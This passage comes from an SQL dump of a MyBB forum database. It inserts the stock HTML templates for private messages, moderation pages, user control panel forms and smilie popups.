align=\"right\"><span class=\"smalltext\">{$readdate}<br />{$readtime}</span></td> <td class=\"trow1\"><input type=\"checkbox\" class=\"checkbox\" name=\"readcheck[{$readmessage[\'pmid\']}]\" value=\"1\" /></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('321', 'private_tracking_unreadmessage', '<tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/new_pm.gif\" alt=\"\" /></td> <td class=\"trow2\">{$unreadmessage[\'subject\']}</td> <td class=\"trow1\" align=\"center\">{$unreadmessage[\'profilelink\']}</td> <td class=\"trow2\" align=\"right\"><span class=\"smalltext\">{$senddate}<br />{$sendtime}</span></td> <td class=\"trow1\"><input type=\"checkbox\" class=\"checkbox\" name=\"unreadcheck[{$unreadmessage[\'pmid\']}]\" value=\"1\" /></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('322', 'private_tracking_nomessage', '<tr> <td align=\"center\" class=\"trow1\" colspan=\"5\">{$lang->no_readmessages}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('323', 'usercp_editlists_user', '<li style=\"width: 33%; float: left; list-style: none; margin-bottom: 4px;\" id=\"{$type}_{$user[\'uid\']}\"> <a href=\"usercp.php?action=do_editlists&amp;my_post_key={$mybb->post_code}&amp;manage={$type}&amp;delete={$user[\'uid\']}\" onclick=\"return UserCP.removeBuddy(\'{$type}\', {$user[\'uid\']});\" title=\"{$lang->remove_from_list}\"><img src=\"{$theme[\'imgdir\']}/buddy_delete.gif\" title=\"[{$lang->delete}]\" alt=\"{$lang->remove_from_list}\" style=\"vertical-align: middle;\" /></a> <img src=\"{$theme[\'imgdir\']}/buddy_{$status}.gif\" title=\"{$lang->$status}\" alt=\"\" style=\"vertical-align: middle;\" /> {$profile_link} </li>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('324', 'showthread_threadedbox', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><span class=\"smalltext\"><strong>{$lang->messages_in_thread}</strong></span></td> </tr> <tr> <td class=\"trow1\">{$threadedbits}</td> </tr> </table> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('325', 'showthread_multipage', '<tr> <td class=\"tcat\" colspan=\"2\"> {$multipage}</td> </tr>', '-2', '126', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('326', 'forumbit_moderators', '<br />{$lang->forumbit_moderated_by} {$moderators}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('327', 'moderation_deletepoll', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_poll}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_poll}</strong></td> </tr> {$loginbox} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_poll}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_deletepoll\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"delete\" value=\"1\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('328', 'member_profile_signature', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->users_signature}</strong></td> </tr> <tr> <td class=\"trow1\">{$memprofile[\'signature\']}</td> </tr> </table>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('329', 'newreply_modoptions', '<tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->mod_options}</strong></td> <td class=\"trow2\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"modoptions[closethread]\" value=\"1\"{$closecheck} />&nbsp;{$lang->close_thread}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"modoptions[stickthread]\" value=\"1\"{$stickycheck} />&nbsp;{$lang->stick_thread}</label> </span></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('330', 'smilieinsert_getmore', '<tr> <td class=\"trow2\" align=\"center\"><span class=\"smalltext\"><strong>[<a href=\"javascript:clickableEditor.openGetMoreSmilies(\'clickableEditor\');\">{$lang->smilieinsert_getmore}</a>]</strong></span></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('331', 'misc_smilies_popup', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->smilies_listing}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var editor = eval(\'opener.\' + \'{$editor}\'); function insertSmilie(code) { if(editor) { editor.performInsert(code, \"\", true, false); } } // --> </script> </head> <body> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->smilies_listing}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"4\"><span class=\"smalltext\">{$lang->click_to_add}</span></td> </tr> {$smilies} <tr> <td class=\"thead\" colspan=\"4\" align=\"center\"><span class=\"smalltext\">[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]</span></td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('332', 'misc_smilies_popup_smilie', '<td class=\"{$class}\" align=\"center\"><img src=\"{$smilie[\'image\']}\" alt=\"{$smilie[\'find\']}\" title=\"{$smilie[\'find\']}\" onclick=\"insertSmilie(\'{$smilie[\'insert\']}\');\" /></a></td> <td class=\"{$class}\">{$smilie[\'find\']}</td>', '-2', '123', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('333', 'showteam', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->forum_team}</title> {$headerinclude} </head> <body> {$header} {$grouplist} {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('334', 'index_birthdays', '<tr><td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->todays_birthdays}</strong></span></td></tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$bdays}</span></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('335', 'moderation_getip', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->get_post_ip}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->get_post_ip}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td> <td class=\"trow1\">{$username}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->ip_address}</strong></td> <td class=\"trow2\">{$post[\'ipaddress\']}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->hostname}<br /><span class=\"smalltext\">{$lang->if_resolvable}</span></strong></td> <td class=\"trow2\">{$hostname}</td> </tr> {$modoptions} </table> {$footer} </body> </html>', '-2', '1608', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('336', 'moderation_getip_modoptions', '<tr> <td class=\"trow2\"><strong>{$lang->mod_options}</strong></td> <td class=\"trow2\"> <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$post[\'ipaddress\']}&amp;search_users=1\">{$lang->search_ip_users}</a><br /> <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$post[\'ipaddress\']}&amp;search_posts=1\">{$lang->search_ip_posts}</a><br /> <a href=\"modcp.php?action=iplookup&ipaddress={$post[\'ipaddress\']}\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/modcp.php?action=iplookup&ipaddress={$post[\'ipaddress\']}\', \'iplookup\', 500, 250); return false;\">{$lang->info_on_ip}</a> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('337', 'postbit_iplogged_hiden', '<p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$lang->postbit_ipaddress_logged}</a></p>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('338', 'usercp_options_tppselect', '<tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->tpp}</span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"tpp\"> <option value=\"\">{$lang->use_default}</option> {$tppoptions} </select> </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('339', 'index_logoutlink', '<a href=\"member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->index_logout}</a> | ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('340', 'postbit_iplogged_show', '<p class=\"smalltext\">{$lang->postbit_ipaddress} {$post[\'ipaddress\']}</p>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('341', 'usercp_changeavatar', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title> {$headerinclude} </head> <body> {$header} <form enctype=\"multipart/form-data\" action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->change_avatar}</strong></td> </tr> <tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"url\"{$checked[\'url\']} /></td> <td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_url}</strong><br /><span class=\"smalltext\">{$lang->avatar_url_note}</span></td> <td class=\"trow1\" width=\"55%\"><input type=\"text\" class=\"textbox\" name=\"avatarurl\" size=\"25\" maxlength=\"100\" value=\"{$avatarurl}\" /></td> </tr> <tr> <td align=\"center\" class=\"trow2\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"upload\"{$checked[\'upload\']} /></td> <td class=\"trow2\" width=\"40%\"><strong>{$lang->avatar_upload}</strong><br /><span class=\"smalltext\">{$lang->avatar_upload_note}</span></td> <td class=\"trow2\" width=\"55%\"><input type=\"file\" name=\"avatarupload\" size=\"25\" value=\"\" class=\"fileupload\" />{$uploadedmsg}</td> </tr> <tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"list\"{$checked[\'list\']} /></td> <td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_list}</strong><br /><span class=\"smalltext\">{$lang->avatar_list_note}</span></td> <td class=\"trow1\" width=\"55%\"> <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"> <tr> <td valign=\"middle\"> <select name=\"avatarlist\" size=\"5\" onChange=\"document.images.avatarpic.src=\'{$mybb->settings[\'avatardir\']}/\'+this[this.selectedIndex].value;\"> {$listoptions} </select> </td> <td valign=\"middle\"> <img src=\"{$avatarpic}\" name=\"avatarpic\" width=\"80\" height=\"80\" /> </td> </tr> </table> </td> </tr> <tr> <td align=\"center\" class=\"trow2\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"none\"{$checked[\'none\']} /></td> <td colspan=\"2\" class=\"trow2\" width=\"95%\"><strong>{$lang->no_avatar}</strong><br /><span class=\"smalltext\">{$lang->no_avatar_note}</span></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_avatar\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('342', 'usercp_notepad', '<br /> <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->personal_notepad}</strong></td> </tr> <tr> <td align=\"center\" class=\"trow1\" width=\"100%\"> <textarea name=\"notepad\" cols=\"1\" rows=\"10\" class=\"usercp_notepad\">{$mybb->user[\'notepad\']}</textarea> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_notepad\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_notepad}\" /> </div> </form>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('343', 'private_messagebit_sep', '<tr> <td class=\"tcat\" align=\"center\" colspan=\"6\" height=\"1\"><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"1\" alt=\"\"/></td> </tr> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('344', 'polls_editpoll_option', '<tr> <td>{$lang->option} {$counter}:&nbsp;</td> <td><input type=\"text\" class=\"textbox\" name=\"options[{$counter}]\" value=\"{$option}\" /></td> <td>{$lang->votes}&nbsp;</td> <td><input type=\"text\" class=\"textbox\" name=\"votes[{$counter}]\" value=\"{$optionvotes}\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('345', 'member_resetpassword', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reset_password}</title> {$headerinclude} </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->reset_password}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"30%\"><strong>{$lang_username}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" value=\"{$user[\'username\']}\" /></td> </tr> <tr> <td class=\"trow1\" width=\"30%\"><strong>{$lang->activation_code}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"code\" value=\"{$code}\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"resetpassword\" /><input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->send_password}\" /></div> </form> {$footer} </body> </html>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('346', 'forumdisplay_thread_multipage', ' <span class=\"smalltext\">({$lang->pages} {$threadpages}{$morelink})</span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('347', 'forumdisplay_thread_multipage_page', '<a href=\"{$page_link}\">{$i}</a> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('348', 'forumdisplay_thread_multipage_more', '... <a href=\"{$page_link}\">{$thread[\'pages\']}</a>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('349', 'member_profile_customfields', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_additional_info}</strong></td> </tr> {$customfields} </table>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('350', 'member_profile_customfields_field', '<tr> <td class=\"{$bgcolor}\" width=\"40%\"><strong>{$customfield[\'name\']}:</strong></td> <td class=\"{$bgcolor}\" width=\"60%\">{$customfieldval}</td> </tr> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('351', 'forumdisplay_usersbrowsing_user', '{$comma}{$user[\'profilelink\']}{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('352', 'forumdisplay_usersbrowsing', '<span class=\"smalltext\">{$lang->users_browsing_forum} {$onlinemembers}{$onlinesep}{$invisonline}{$onlinesep2}{$guestsonline}</span><br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('353', 'member_lostpw', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->lost_pw}</title> {$headerinclude} </head> <body> {$header} <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->lost_pw_form}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->email_address}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->request_user_pass}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_lostpw\" /> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('354', 'usercp_changename', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->change_username}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->change_username}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->change_username}</strong></td> </tr> <tr> <td class=\"trow2\" width=\"40%\"><strong>{$lang->new_username}</strong></td> <td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"25\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_changename\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_username}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('355', 'moderation_split_post', '<tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td> </tr> <tr> <td class=\"{$altbg}\" valign=\"top\" align=\"center\" width=\"1%\"><input type=\"checkbox\" class=\"checkbox\" name=\"splitpost[{$post[\'pid\']}]\" value=\"1\" /></td> <td class=\"{$altbg}\">{$message}</td> </tr>', '-2', '127', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('356', 'newreply_threadreview_more', '<tr> <td class=\"thead\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->thread_review_more}</strong></span></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('357', 'misc_whoposted', '<html> <head> <title>{$lang->who_posted}</title> {$headerinclude} </head> <body style=\"margin:0px;top:0px;left:0px\" class=\"trow2\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->total_posts} {$numposts}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong><a href=\"misc.php?action=whoposted&amp;tid={$tid}&amp;sort=username\">{$lang->user}</a></strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong><a href=\"misc.php?action=whoposted&amp;tid={$tid}&amp;sort=numposts\">{$lang->num_posts}</a></strong></span></td> </tr> {$whoposted} <tr> <td colspan=\"2\" class=\"thead\" align=\"center\"><span class=\"smalltext\">[<a href=\"javascript:self.close();\">{$lang->close_window}</a>]</span></td> </tr> </table> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('358', 'misc_whoposted_poster', '<tr> <td class=\"{$altbg}\">{$profile_link}</a></td> <td class=\"{$altbg}\">{$poster[\'posts\']}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('359', 'moderation_deleteposts_post', '<tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td> </tr> <tr> <td class=\"{$altbg}\" valign=\"top\" align=\"center\" style=\"width:5%\"><input type=\"checkbox\" class=\"checkbox\" name=\"deletepost[{$post[\'pid\']}]\" value=\"1\" /></td> <td class=\"{$altbg}\">{$message}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('360', 'moderation_deleteposts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_posts}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_posts}</strong></td> </tr> {$posts} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_selected_posts}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_deleteposts\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('361', 'moderation_split', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->split_thread}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->split_thread}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->new_thread_info}</strong></span></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->new_subject}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"newsubject\" value=\"{$lang->split_thread_subject} {$thread[\'subject\']}\" size=\"50\" /></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->new_forum}</strong></td> <td class=\"trow1\">{$forumselect}</td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->posts_to_split}</strong></td> </tr> {$posts} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->split_thread}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_split\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> {$footer} </body> </html>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('362', 'newreply_threadreview_post', '<tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$reviewpostdate} {$reviewposttime}</strong></span></td> </tr> <tr> <td class=\"{$altbg}\"> {$reviewmessage} </td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('363', 'newreply_threadreview', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\"><strong>{$lang->thread_review}</strong></td> </tr> {$reviewbits} {$reviewmore} </table> ', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('364', 'sendthread', '<html> <head> <title>{$threadprefix[\'prefix\']} {$thread[\'subject\']} - {$lang->send_thread}</title> {$headerinclude} </head> <body> {$header} {$errors} <form action=\"sendthread.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->send_thread}</strong></td> </tr> <tr> <td width=\"40%\" class=\"trow1\"><strong>{$lang->recipient}</strong><br /><span class=\"smalltext\">{$lang->recipient_note}</span></td> <td width=\"60%\" class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"email\" value=\"{$email}\" /></td> </tr> {$guestfields} <tr> <td width=\"40%\" class=\"trow2\"><strong>{$lang->subject}</strong></td> <td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"subject\" value=\"{$subject}\" /></td> </tr> <tr> <td valign=\"top\" width=\"40%\" class=\"trow1\"><strong>{$lang->message}</strong></td> <td width=\"60%\" class=\"trow1\"><textarea cols=\"50\" rows=\"10\" name=\"message\">{$message}</textarea></td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_sendtofriend\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->send_thread}\" /></div> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('365', 'usercp_editsig', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_sig}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$error} {$signature} <table border=\"0\" 